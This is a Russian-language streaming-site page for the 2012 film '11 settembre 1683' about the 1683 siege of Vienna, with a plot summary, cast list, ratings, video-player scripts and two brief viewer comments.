<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Одиннадцатое сентября 1683 года (2012) смотреть онлайн бесплатно</title>
<meta name="description" content="Кинокартина, повествующая о масштабной битве, произошедшей между польско - австрийско - германскими войсками и солдатами армии Османской империи у стен Вены. Город был важным пунктом на пути войск султана Мехмеда: отсюда они должны были пройти на зап" />
<meta name="keywords" content="войск, султана, пунктом, важным, город, мехмеда, отсюда, европу, запад, пройти, должны, империи, покорить, битве, между, масштабной, повествующая, османской, польско, произошедшей" />
<meta name="generator" content="DataLife Engine (http://dle-news.ru)" />
<meta property="og:site_name" content="Фильмы онлайн, смотреть бесплатно Кино онлайн в хорошем качестве - КиноКрад.НЕТ" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Одиннадцатое сентября 1683 года (2012)" />
<meta property="og:url" content="http://kinokrad.co/10029-odinnadcatoe-sentyabrya-1683-goda.html" />
<meta property="og:image" content="http://s.kinokrad.co/uploads/img/tb3/1011c078c46d39780b4e05a20c6d62de.jpeg" />
<meta property="og:description" content="Кинокартина, повествующая о масштабной битве, произошедшей между польско - австрийско - германскими войсками и солдатами армии Османской империи у стен Вены. Город был важным пунктом на пути войск султана Мехмеда: отсюда они должны были пройти на зап" />
<link rel="search" type="application/opensearchdescription+xml" href="http://kinokrad.co/engine/opensearch.php" title="Фильмы онлайн, смотреть бесплатно Кино онлайн в хорошем качестве - КиноКрад.НЕТ" />

<link rel="alternate" type="application/rss+xml" title="Фильмы онлайн, смотреть бесплатно Кино онлайн в хорошем качестве - КиноКрад.НЕТ" href="rss.xml" />
<script type="text/javascript" src="http://kinokrad.co/engine/classes/js/jquery.js"></script>
<script type="text/javascript" src="http://kinokrad.co/engine/classes/js/jqueryui.js"></script>
<script type="text/javascript" src="http://kinokrad.co/engine/classes/js/dle_js.js"></script>
<script type="text/javascript" src="http://kinokrad.co/engine/classes/highslide/highslide.js"></script>
	
    <link rel="publisher" href="https://plus.google.com/113377706278620063311/posts">

    
    <meta name="msvalidate.01" content="B66D3A856DFE448E3A46152BC4043034">
    <meta name="google-site-verification" content="GGsdfcWvTdnBkQaNe22Br1FiIjbZBEJf1yj6OAkw_LU">
    <meta name="yandex-verification" content="55f3cbe1ffe9729d">

	<link rel="shortcut icon" href="templates/ntpl/images/favicon.ico">
	<link media="screen" href="templates/ntpl/css-min/styles_base.css" type="text/css" rel="stylesheet">
	<link media="screen" href="templates/ntpl/css-min/styles.css%3F6553423.css" type="text/css" rel="stylesheet">
	<link media="screen" href="templates/ntpl/css-min/jquery.bxslider.css" type="text/css" rel="stylesheet">
	<link media="screen" href="templates/ntpl/css-min/engine.css" type="text/css" rel="stylesheet">
    <link media="screen" href="templates/ntpl/css-min/orating.css" type="text/css" rel="stylesheet">
    <link media="screen" href="templates/ntpl/css-min/social.css" type="text/css" rel="stylesheet">

    <!--[if lte IE 6]>
    <link rel="stylesheet" href="css/style_ie.css" type="text/css" media="screen, projection">
    <![endif]-->

	<script type="text/javascript" src="templates/ntpl/js-min/jquery00.js"></script>
	<script type="text/javascript" src="templates/ntpl/js-min/jquery.slides.js"></script>
	<script type="text/javascript" src="templates/ntpl/js-min/jquery.bxslider.js"></script>
	<script type="text/javascript" src="templates/ntpl/js-min/jquery.scrollTo.min.js"></script>
    <script type="text/javascript" src="templates/ntpl/js-min/jquery.simplemodal.js"></script>
    <script type="text/javascript" src="templates/ntpl/js-min/orating_pack.js"></script>
    <script type="text/javascript" src="templates/ntpl/js-min/jquery.cookie.js"></script>
    <script type="text/javascript" src="templates/ntpl/js-min/libs.js%3F1.2.6"></script>
    <script type="text/javascript" src="templates/ntpl/js-min/collum.js"></script>
	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>

    
    <script type="text/javascript" src="video184-1484.js"></script>
    <script type="text/javascript" src="uppod-0.5.41.js"></script>

	<script type="text/javascript" src="templates/all/js-min/cookies.js"></script>
	<script type="text/javascript" src="templates/all/js-min/storageapi.js"></script>
	<script type="text/javascript" src="http://kinokrad.co/templates/all/js-min/timesave.js?1481548222"></script>
    

    <script type="text/javascript" src="templates/all/js-min/vk.js%3F_=45367"></script>

    

	<style type="text/css">
		#brnd8da0b1335 { position: static !important; }
		body #wrapper.bgmain { margin-top: 250px !important; }
	</style>
</head>
<body style="position:static!important">
<style type="text/css">body { padding: 0 !important}</style>
<!-- comment -->

<!--noindex--><div id="loading-layer" style="display:none">Загрузка. Пожалуйста, подождите...</div><!--/noindex-->

<script type="text/javascript">
<!--
var dle_root       = 'http://kinokrad.co/';
var dle_admin      = '';
var dle_login_hash = '';
var dle_group      = 5;
var dle_skin       = 'ntpl';
var dle_wysiwyg    = '0';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить"];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Сообщение отправлено Администратору!';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведет к удалению всех его комментариев';
var dle_complaint  = 'Укажите: 1-Ваш браузер, 2-операционку, 3-скорость интернета, 4-ваш город. Попробуйте обновить кеш нажав Ctrl+F5. Попробуйте запустить фильм с другого браузера, отключите Adblock в расширениях. Опишите Вашу проблему как можно подробнее...';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Спасибо за замечание! В ближайшее время все ошибки будут исправлены';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_del_news   = 'Удалить статью';
var allow_dle_delete_news   = false;
//-->
</script><script type="text/javascript">  
<!--  
	hs.graphicsDir = 'http://kinokrad.co/engine/classes/highslide/graphics/';
	hs.outlineType = 'rounded-white';
	hs.numberOfImagesToPreload = 0;
	hs.showCredits = false;
	
	hs.lang = {
		loadingText :     'Загрузка...',
		playTitle :       'Просмотр слайдшоу (пробел)',
		pauseTitle:       'Пауза',
		previousTitle :   'Предыдущее изображение',
		nextTitle :       'Следующее изображение',
		moveTitle :       'Переместить',
		closeTitle :      'Закрыть (Esc)',
		fullExpandTitle : 'Развернуть до полного размера',
		restoreTitle :    'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',
		focusTitle :      'Сфокусировать',
		loadingTitle :    'Нажмите для отмены'
	};
	
	hs.align = 'center';
	hs.transitions = ['expand', 'crossfade'];
	hs.addSlideshow({
		interval: 4000,
		repeat: false,
		useControls: true,
		fixedControls: 'fit',
		overlayOptions: {
			opacity: .75,
			position: 'bottom center',
			hideOnMouseOut: true
		}
	});
//-->
</script>

<div class="head">
    <div id="wrapp" class="clearfix">
        <div class="k-logo-area left">
            <a href="index.html" class="k-logo left"><img src="templates/ntpl/images/logosmall2.png" alt="" /></a>
            
        </div>
		<div class="search-block">
			<form action="index.html" name="searchform" method="post">
				<input type="hidden" name="do" value="search" />
				<input type="hidden" name="subaction" value="search" />
				<input id="story" name="story" class="inputsrch" value="Поиск по сайту..." onblur="if(this.value=='') this.value='Поиск по сайту...';" onfocus="if(this.value=='Поиск по сайту...') this.value='';" type="text" />
				<input title="Найти" alt="Найти" type="image" class="imginput" src="templates/ntpl/images/dot.png" />
			</form>
		</div>
        <div class="left">
            <div class="k-reg left">
                <a rel="nofollow" id="loginlink" href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" title="Вход">Вход</a>
                <span>/</span>
                <a href="index.php%3Fdo=register.html">Регистрация</a>
            </div>
        </div>
    </div>
</div>
<div id="logindialog" title="Авторизация" style="display:none;">
    <form method="post" action="index.html">
        <div class="logform">
            <ul class="reset">
                <li class="lfield"><label for="login_name">Логин:</label><br /><input type="text" name="login_name" id="login_name" /></li>
                <li class="lfield lfpas"><label for="login_password">Пароль (<a href="index.php%3Fdo=lostpassword.html">Забыли?</a>):</label><br /><input type="password" name="login_password" id="login_password" /></li>
                <li class="lfield lfchek"><input type="checkbox" name="login_not_save" id="login_not_save" value="1"/><label for="login_not_save">&nbsp;Чужой компьютер</label></li>
                <li class="lbtn"><button class="fbutton" onclick="submit();" type="submit" title="Войти"><span>Войти</span></button></li>
            </ul>
            <input name="login" type="hidden" id="login" value="submit" />
        </div>
    </form>
</div>


    <div id="wrapper" class="bgmain list showfull">
        <div id="middle">
            <div id="contbox">
                <div id="container">
                    <div id="content" class="noselect">
						

						
						
						<div class="spbr"><div class="speedbar lines"><span id="dle-speedbar" xmlns:v="http://rdf.data-vocabulary.org/#"><span typeof="v:Breadcrumb"><a href="index.html" rel="v:url" property="v:title"><span>Главная</span></a></span> &raquo; <span typeof="v:Breadcrumb"><a href="filmy-2012/index.html"  rel="v:url" property="v:title">Фильмы 2012</a></span> &raquo; Одиннадцатое сентября 1683 года (2012)</span></div></div>
						
						

						<div style="width:625px;text-align:center;margin-bottom:10px">
							<div id="b89ba02e9d" style="display: none"></div><!-- comment -->
						</div>

                        

                        

                        

                        
                        
                        <div id='dle-content'><div id="storyID-10029" name="storyID-10029" class="fullbox" itemscope itemtype="http://schema.org/Article">
	<div class="fallsttitle"><h1 itemprop="name">Одиннадцатое сентября 1683 года (2012)</h1></div>
	<div class="leftfull">
		<div class="bigposter">
			<img title="Одиннадцатое сентября 1683 года (2012)" alt="Одиннадцатое сентября 1683 года (2012)" src="http://image.kinokrad.co/p/f/1421404913_odinnadcatoe-sentyabrya-1683-goda.jpeg" itemprop="image" />
			
		</div>
		<a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#addcom" class="addcomm">Оставить<br />комментарий</a>
	</div>
	
	
	
	<div class="fullright">
		<ul class="janrfall">
			
			<li style="margin-top:10px;">
				<span class="orange" style="float:left; margin: 8px 10px 0 0;">Качество:</span>
				<span class="orange" style="float:left;"><img class="po" src="templates/ntpl/images/dvdrip.png" /></span>
				<div class="clr"></div>
			</li>
			
			<li><span class="orange">Оригинальное название:</span> 11 settembre 1683</li>
			<li><span class="orange">Жанр:</span> <a href='drama/index.html'>драма</a>, <a href='priklyucheniya/index.html'>приключения</a>, <a href='istoriya/index.html'>история</a></li>
			<li><span class="orange">Из цикла про:</span> <a href='films-of-war/index.html'>войну и ВОВ 1945 года</a>, <a href='na-realnyh-sobytiyah/index.html'>основанные на реальных событиях</a>, <a href='rycari/index.html'>рыцарей</a></li>
			<li><span class="orange">Год:</span> 2012</li>
			
			<li>
				<span class="orange">
					<span class="masha_index masha_index11" rel="11"></span>
					Страна:
				</span>
				Италия, Польша
			</li>
			
			<li><span class="orange">Продолжительность:</span> 110 мин</li>
			<li><span class="orange">Режиссёр:</span> Ренцо Мартинелли</li>
			
			
			
			<li>
				<span class="orange">
					<span class="masha_index masha_index11" rel="11"></span>
					Премьера РФ:
				</span>
				<span style="color:#008aff;">2012</span>
			</li>
			
			
			<li><span class="orange">Доступно на:</span> iPhone, iPad, Android</li>
		</ul>

		<!--noindex-->
        <div class="clr"></div>
        
		<div class="ratingtitle" style="float:left;padding-bottom:0;padding-top:5px;">
            <span>Поставьте свою оценку:</span><br />
            <div itemscope itemtype="http://data-vocabulary.org/Review-aggregate" class="ratingfull">
                		<div id='ratig-layer-10029'>
			<div class="rating">
				<ul itemprop="rating" itemscope itemtype="http://data-vocabulary.org/Rating" class="unit-rating">
					<li itemprop="average" class="current-rating" style="width:62%;">6</li>
					<li><a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" title="1" class="r1-unit" onclick="doRate('1', '10029'); return false;">1</a></li>
					<li><a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" title="2" class="r2-unit" onclick="doRate('2', '10029'); return false;">2</a></li>
					<li><a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" title="3" class="r3-unit" onclick="doRate('3', '10029'); return false;">3</a></li>
					<li><a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" title="4" class="r4-unit" onclick="doRate('4', '10029'); return false;">4</a></li>
					<li><a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" title="5" class="r5-unit" onclick="doRate('5', '10029'); return false;">5</a></li>
					<li><a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" title="6" class="r6-unit" onclick="doRate('6', '10029'); return false;">6</a></li>
					<li><a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" title="7" class="r7-unit" onclick="doRate('7', '10029'); return false;">7</a></li>
					<li><a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" title="8" class="r8-unit" onclick="doRate('8', '10029'); return false;">8</a></li>
					<li><a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" title="9" class="r9-unit" onclick="doRate('9', '10029'); return false;">9</a></li>
					<li itemprop="best"><a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" title="10" class="r10-unit" onclick="doRate('10', '10029'); return false;">10</a></li>
				</ul>
				<span itemprop="votes" style="font-size:11px;display:none;">70</span>
			</div>
		</div>
            </div>
        </div>
        
		<div class="rating-more"><b>Общий бал: 6.2</b> Проголосовало людей: <span itemprop="votes" id="vote-num-id-10029">70</span></div>
        <div class="clr"></div>
		<!--/noindex-->
	</div>

	<!--noindex-->
	<div class="favshoetbox1">
		<a class="favorfull_plus1" rel="nofollow" href="index.html%3Fdo=register.html" title="Закладки доступны только зарегестрированным пользователям"></a>
	</div>
	<div class="favfullbox">
		<div class="falldate" title="Дата добавления">
			<div>Дата: <span style="color:#999;">16-01-2015, 13:41</span></div>
			<div>Добавил: <span><a onclick="ShowProfile('PanzerAlex', 'http://kinokrad.co/user/PanzerAlex/', '0'); return false;" href="http://kinokrad.co/user/PanzerAlex/">PanzerAlex</a></span></div>
			<div class="clr"></div>
		</div>
        
		<div class="shortcommfull">
			3
		</div>
		<div class="clr"></div>
	</div>
	<!--/noindex-->
	<div class="clearfix"></div>
</div>

<div class="fulltext" id="fulltext" itemprop="description">
	<!-- TEXT.RU -->
	Кинокартина, повествующая о масштабной битве, произошедшей между польско - австрийско - германскими войсками и солдатами армии Османской империи у стен Вены. Город был важным пунктом на пути войск султана Мехмеда: отсюда они должны были пройти на запад и покорить христианскую Европу. Но лёгкого взятия не получилось - два месяца осады не дали результата. И судьба города решалась в один день. Главный герой фильма, Марко да Авила, - монах, духовный учитель императора Леопольда I. Ранним утром 11 сентября 1683 года, перед самым началом решающей битвы за Вену, он обращается со страстной речью к своим братьям - христианам. Своими словами он вдохновляет их на победу в сражении, исход которого должен положить конец мусульманской экспансии в Европу 17-го века.
	<!-- /TEXT.RU -->
</div>


<div class="screens">
    <div class="kadr">
        <span class="tit"></span>
    </div>
    <div class="roli btnmorescren clicked">
        <span class="tit">Скриншоты и актеры:</span>
        <div class="bg"></div>
    </div>
    <div class="scrinover">
        <a onclick="return hs.expand(this)" href="http://s.kinokrad.co/uploads/posts/2015-01/1420399791_odn1.jpg"><img src="http://s.kinokrad.co/uploads/posts/2015-01/thumbs/1420399791_odn1.jpg" alt="Одиннадцатое сентября 1683 года (2012)" /></a><a onclick="return hs.expand(this)" href="http://s.kinokrad.co/uploads/posts/2015-01/1420399820_odn2.jpg"><img src="http://s.kinokrad.co/uploads/posts/2015-01/thumbs/1420399820_odn2.jpg" alt="Одиннадцатое сентября 1683 года (2012)" /></a><a onclick="return hs.expand(this)" href="http://s.kinokrad.co/uploads/posts/2015-01/1420399852_odn3.jpg"><img src="http://s.kinokrad.co/uploads/posts/2015-01/thumbs/1420399852_odn3.jpg" alt="Одиннадцатое сентября 1683 года (2012)" /></a><a onclick="return hs.expand(this)" href="http://s.kinokrad.co/uploads/posts/2015-01/1420399821_odn4.jpg"><img src="http://s.kinokrad.co/uploads/posts/2015-01/thumbs/1420399821_odn4.jpg" alt="Одиннадцатое сентября 1683 года (2012)" /></a><a onclick="return hs.expand(this)" href="http://s.kinokrad.co/uploads/posts/2015-01/1420399880_odn5.jpg"><img src="http://s.kinokrad.co/uploads/posts/2015-01/thumbs/1420399880_odn5.jpg" alt="Одиннадцатое сентября 1683 года (2012)" /></a><a onclick="return hs.expand(this)" href="http://s.kinokrad.co/uploads/posts/2015-01/1420399821_odn6.jpg"><img src="http://s.kinokrad.co/uploads/posts/2015-01/thumbs/1420399821_odn6.jpg" alt="Одиннадцатое сентября 1683 года (2012)" /></a>
        <div class="postactors"><span class="tit">Актерский состав:</span><div class="fullactbox"><a href="199765-f-myurrjey-abraham.html" target="_blank" rel="nofollow"><div class="fullact"><img src="uploads/peoples/7857_f-murray-abraham.jpg" alt="Ф. Мюррэй Абрахам" title="Ф. Мюррэй Абрахам"></div><div class="acttitle">Ф. Мюррэй Абрахам</div></a></div><div class="fullactbox"><a href="214486-jenriko-lo-verso.html" target="_blank" rel="nofollow"><div class="fullact"><img src="uploads/peoples/23881_enrico-lo-verso.jpg" alt="Энрико Ло Версо" title="Энрико Ло Версо"></div><div class="acttitle">Энрико Ло Версо</div></a></div><div class="fullactbox"><a href="194987-aliciya-bahleda.html" target="_blank" rel="nofollow"><div class="fullact"><img src="uploads/peoples/3041_alicja-bachleda-curus.jpg" alt="Алиция Бахледа" title="Алиция Бахледа"></div><div class="acttitle">Алиция Бахледа</div></a></div><div class="fullactbox"><a href="http://kinokrad.co/206315-ezhi-skolimovskiy.html" target="_blank" rel="nofollow"><div class="fullact"><img src="http://kinokrad.co/uploads/peoples/14676_jerzy-skolimowski.jpg" alt="Ежи Сколимовский" title="Ежи Сколимовский"></div><div class="acttitle">Ежи Сколимовский</div></a></div><div class="fullactbox"><a href="219646-petr-adamchik.html" target="_blank" rel="nofollow"><div class="fullact"><img src="uploads/peoples/29821_piotr-adamczyk.jpg" alt="Петр Адамчик" title="Петр Адамчик"></div><div class="acttitle">Петр Адамчик</div></a></div><div class="fullactbox"><div class="fullact"><img src="uploads/peoples/noact.jpeg"></div><div class="acttitle">Кристина Серафини</div></div><div class="fullactbox"><a href="http://kinokrad.co/216012-maryus-kivu.html" target="_blank" rel="nofollow"><div class="fullact"><img src="http://kinokrad.co/uploads/peoples/25642_marius-chivu.jpg" alt="Марьюс Киву" title="Марьюс Киву"></div><div class="acttitle">Марьюс Киву</div></a></div></div>
    </div>
</div>



<div class="keyseo">
	<strong>Смотреть онлайн Одиннадцатое сентября 1683 года (2012) в хорошем качестве</strong>
</div>


<div id="amedia"></div>

<!--noindex-->
<div class="btnvideobox">
	<ul class="film">
		<li id="ctab-1"><a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#tab-1">Смотреть</a></li>
		<li><a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#tab-2">Трейлер</a></li>
		<!-- <div class="eror"><a href="/?do=register" title="Жалобы доступны только зарегестрированным пользователям" rel="nofollow">Есть жалоба?</a></div> -->
		<div class="eror"><a rel="nofollow" href="javascript:AddComplaint('10029', 'news')">Есть жалоба?</a></div>
        <div class="error">
            <a href="otveti.html" rel="nofollow">У вас не работает фильм?</a>
        </div>
	</ul>
	<div id="tab-1" class="film">
		<div class="boxfilm">
            
                
                
                    <div data-pid="10029">
                        <div id="videoplayer_10029" style="width:612px;height:344px;"></div>
                    </div>

                    <script type="text/javascript">
                        function show_ady() {
                            return !Boolean(navigator.userAgent.match(/Large|GoogleTV|SmartTV|Smart-TV|LG Browser|Presto|Roku|HDMI/i));
                        }

                        function flash_installed() {
                            if (typeof(navigator.plugins)!="undefined" && typeof(navigator.plugins["Shockwave Flash"])=="object") {
                                return true;
                            } else if (typeof window.ActiveXObject != "undefined") {
                                try {
                                    if (new ActiveXObject("ShockwaveFlash.ShockwaveFlash")) {
                                        return true;
                                    }
                                } catch(e) {};
                            }
                            return false;
                        }

                        function html5support() { return !!document.createElement('video').canPlayType; }

                        var filmSourceF = "8wGU7ptuTYBngMlr83lu8WXhfCljgez483d57ezYLYx2GYFKIsamBpGT3Ed23FBt6jFGTpEUOpEYi9IYijQuLYGDg4Fn2YFUgY0v7Y6vxw5h2kXlTjQHiLQvGFfE045HT4f1xbPP";
                        var filmSourceM = "#06807407407003a02f02f06d02d06306406e02e06b06906e06f06b07206106402e06306f02f06606906c06507302f06907607106105905305f06b04f03907305703806305a06c07707006f06207904102c03103403803103603303403603203202f04f06406906e06106406306107406f06502e07306506e07407906106207207902e03203003103202e04405604405206907002e06d070034";
                        var htmlCode = "";

	                    if( htmlCode ) {
		                    $("#videoplayer_10029").css({height: '360px'}).html( htmlCode );
	                    } else {

		                    var ua = navigator.userAgent.toLowerCase();

		                    if(ua.indexOf("iphone") != -1 || ua.indexOf("ipad") != -1 || ua.indexOf("android") != -1 || ua.indexOf("windows phone") != -1 || ua.indexOf("blackberry") != -1 || ( !flash_installed() && html5support() ) )  {
			                    
			                    this.videoplayer = new Uppod({m:"video", uid:"videoplayer_10029", file:filmSourceM, st:'uppodvideo'});
			                    
			                    
		                    } else {
			                    if( !flash_installed() ){
				                    document.getElementById("videoplayer_10029").innerHTML = "<a href=http://www.adobe.com/go/getflashplayer>Get Flash-Player</a>";
			                    } else {

				                    var params = {
					                    bgcolor:"#ffffff",
					                    allowFullScreen:"true",
					                    allowScriptAccess:"always",
					                    wmode:'transparent',
					                    id:"videoplayer_10029",
					                    or_timeout: 3,
					                    reloader: 1,
					                    reloadersec: 3,
					                    reloader_timeout: 3,
					                    preloader: 1,
					                    nextor9: 1,
					                    debug: true
				                    };

				                    var flashvars = {
					                    comment: "Одиннадцатое сентября 1683 года (2012)",
					                    uid: 'videoplayer_10029',
					                    
					                    file: filmSourceF,
					                    

					                    

										vast_preroll: "https://psma02.com/va/3.0/971/prepare/pre/0",

										st: "/st/video184-1323.txt"
				                    };

				                    var attributes = { styleClass: "kdm_img" };
				                    new swfobject.embedSWF("/uppod.swf", "videoplayer_10029", "612", "344", "10.0.0", false, flashvars, params, attributes);
			                    }
		                    }
	                    }
                    </script>
                

                

                
        
	  
		
		
		
		
		
	  </div>
	</div>
	<div id="tab-2" class="film">
		<div class="boxfilm">
			
				<div id="trayler_10029" style="width:612px;height:344px;"></div>
				<script type="text/javascript">
					var traylerSource = "http://www.youtube.com/watch?v=XJpi0of_buU";
					if ( traylerSource ) {
						var ua = navigator.userAgent.toLowerCase();
						var flashInstalled = false;
						if (typeof(navigator.plugins)!="undefined" && typeof(navigator.plugins["Shockwave Flash"])=="object") { 
							flashInstalled = true; 
						} else if (typeof window.ActiveXObject != "undefined") { 
							try { 
								if (new ActiveXObject("ShockwaveFlash.ShockwaveFlash")) { 
									flashInstalled = true; 
								} 
							} catch(e) {}; 
						};
						if(ua.indexOf("iphone") != -1 || ua.indexOf("ipad") != -1 || (ua.indexOf("android") != -1 && !flashInstalled)){
							this.videoplayer = new Uppod({m:"video", uid:"trayler_10029", file:traylerSource, st:'uppodvideo'});
						}else{
							if( !flashInstalled ){
								document.getElementById("trayler_10029").innerHTML="<a href=http://www.adobe.com/go/getflashplayer>Get Flash-Player</a>";
							}else{
								var flashvars = {file: traylerSource, st:"/st/video184-1323.txt", quality:"1080", https: 1};
								var params = {bgcolor:"#ffffff", allowFullScreen:"true", allowScriptAccess:"always", wmode:'transparent', id:"trayler_10029"};
								new swfobject.embedSWF("/uppod.swf", "trayler_10029", "612", "344", "10.0.0", false, flashvars, params);
							}
						}
					}
				</script>
			
			
		</div>
	</div>


	<style>
		#tab-1 {
			padding-bottom: 0!important;
		}
		.boxsoc {
			border-top: 1px solid #535353 !important;
		}
	</style>
	<div class="save-block" style="display:none;" data-pl="10029">
		<hr>
		<div class="save-box">
			<a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" class="save-time" style="display:none;">Сохранить время</a>
			<div class="save-right" style="display:none;">
				<a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" class="save-play" style="display:none;" title="Продолжить просмотр">
					<span class="save-text" style="display:none;"></span>
				</a>
				<a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" class="save-del" style="display:none;" title="Удалить время просмотра"></a>
			</div>
			<div class="clearfix"></div>
		</div>
	</div>

</div>

<div class="boxsoc" style="padding-bottom: 3px;">
	<div class="infoplayer"></div>
	<div style="float:left;" class="boxsocbut" rel="nofollow" id="shareurlid-10029">
		<div class="social-likes">
			<div class="vkontakte" title="Поделиться ссылкой во Вконтакте"></div>
			<div class="facebook" title="Поделиться ссылкой на Фейсбуке"></div>
			<div class="odnoklassniki" title="Поделиться ссылкой в Одноклассниках"></div>
			<div class="twitter" title="Поделиться ссылкой в Твиттере"></div>
			<div class="plusone" title="Поделиться ссылкой в Гугл-плюсе"></div>
			<div class="mailru" title="Поделиться ссылкой в Моём мире"></div>
		</div>
	</div>

    
    
    <div class="pretorrent">
        <a rel="nofollow" class="torrent" href="index.html%3Fdo=register.html" title="Скачать данный фильм с торрента" target="_blank"></a>
    </div>
    
    
    

	<div style="display:block;float:right;">
        <a class="favorfull_plus1" rel="nofollow" href="index.html%3Fdo=register.html" title="Закладки доступны только зарегестрированным пользователям"></a>
	</div>

	<div class="clr"></div>
</div>
<!--/noindex-->

<div class="morefilmsblok">
	<div class="morefilmsbox">
		

		<div style="margin-bottom:10px">
			<div id="b00ad8a570" style="display: none"></div><!-- comment -->
		</div>

		<div class="morebb">
			<!--noindex--><p class="podvideo">Рекомендуем к просмотру:</p><!--/noindex-->
			<a href="282950-uchitel-goda.html" class="imgboxover" title="Учитель года (2003)"><img src="http://image.kinokrad.co/p/medium/1438524062_uchitel-goda.jpeg" alt="Учитель года (2003)"><center><span class="titrel">Учитель года (2003)</span><div class="fader"></div></center></a><a href="274920-varshavskaya-bitva-1920-goda.html" class="imgboxover" title="Варшавская битва 1920 года (2011)"><img src="http://image.kinokrad.co/p/medium/1410481378_varshavskaya-bitva-1920-goda.jpeg" alt="Варшавская битва 1920 года (2011)"><center><span class="titrel">Варшавская битва 1920 года (2011)</span><div class="fader"></div></center></a><a href="http://kinokrad.co/267756-11-sentyabrya.html" class="imgboxover" title="11 сентября (2003)"><img src="http://image.kinokrad.co/p/medium/1405895551_11-sentyabrya.jpeg" alt="11 сентября (2003)"><center><span class="titrel">11 сентября (2003)</span><div class="fader"></div></center></a><a href="9319-lyubov-zhivet-tri-goda-2012-smotret-onlayn.html" class="imgboxover" title="Любовь живет три года (2012)"><img src="http://image.kinokrad.co/p/medium/1395241189_lyubov-zhivet-tri-goda.jpeg" alt="Любовь живет три года (2012)"><center><span class="titrel">Любовь живет три года (2012)</span><div class="fader"></div></center></a><a href="7993-grazhdanin-poet.-progon-goda.html" class="imgboxover" title="Гражданин поэт. Прогон года (2012)"><img src="http://image.kinokrad.co/p/medium/1395353853_grazhdanin-poet.-progon-goda.jpeg" alt="Гражданин поэт. Прогон года (2012)"><center><span class="titrel">Гражданин поэт. Прогон года (2012)</span><div class="fader"></div></center></a>
		</div>
	</div>
	<div class="clr"></div>
</div>

<div class="clr"></div>

<div class="clr"></div>

<div class="commblock"> 
	<div class="clr"></div><!-- no recense -->
    <div id="addcom" style="margin-top:0;">
		
	</div>
    
    <!--noindex-->
    <div>
        <div class="baseform">
            <center>
                <div class="baseform3"><img width="40" src="templates/ntpl/images/vnimanie.png"></div>
                <div class="baseform2">Комментарии могут оставлять только <a rel="nofollow" href="index.php%3Fdo=register.html">зарегистрированные</a> пользователи!</div>
            </center>
        </div>
    </div>
    <!--/noindex-->
    
	<a name="comment"></a><form method="post" action="10029-odinnadcatoe-sentyabrya-1683-goda.html" name="dlemasscomments" id="dlemasscomments"><div id="dle-comments-list">

<div id="dle-ajax-comments"></div>
<div id='comment-id-161902'><div class="commbox">
	<div class="commava"><img src="http://s.kinokrad.co/uploads/fotos/foto_267094.jpg"/></div>
	<div class="commtext">
		<div class="yshko"></div>
		<img class="medal-rating" src="templates/ntpl/images/medal-0-20.png" alt="новичек" title="новичек" />
		<div class="commtext-box">
			<p class="recautor"><a onclick="ShowProfile('sirakuz-72', 'http://kinokrad.co/user/sirakuz-72/', '0'); return false;" rel="nofollow" href="http://kinokrad.co/user/sirakuz-72/">sirakuz-72</a></p>
			
			<div id='comm-id-161902'>ФИЛЬМ ХОРОШ И СТОИТ ПОСМОТРЕТЬ И АКТЕРЫ ХОРОШИ</div><br/>
		<span style="color:#919191;">13 мая 2016 14:53
			<div class="ocomm" id="ocomm-161902">
				<a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" class="orating_m" title="Не нравится" onclick="ocomrate(161902,0);return false;"></a>
				<a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" class="orating_p" title="Нравится" onclick="ocomrate(161902,1);return false;"></a>
				<a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" class="ocomm_res" onclick="ocomstat(161902,1,true);return false;">+1</a>
			</div>
		</span>
			
			<div class="comedit">
				
				<div class="clr"></div>
			</div>
		</div>
	</div>
</div>
<div class="clr"></div>

</div><div id='comment-id-153619'><div class="commbox">
	<div class="commava"><img src="http://s.kinokrad.co/uploads/fotos/foto_304702.png"/></div>
	<div class="commtext">
		<div class="yshko"></div>
		<img class="medal-rating" src="templates/ntpl/images/medal-0-20.png" alt="новичек" title="новичек" />
		<div class="commtext-box">
			<p class="recautor"><a onclick="ShowProfile('Shapiat', 'http://kinokrad.co/user/Shapiat/', '0'); return false;" rel="nofollow" href="http://kinokrad.co/user/Shapiat/">Shapiat</a></p>
			
			<div id='comm-id-153619'>Задумка отличная, реализация не очень, но всё таки равных крылатым гусарам нет!</div><br/>
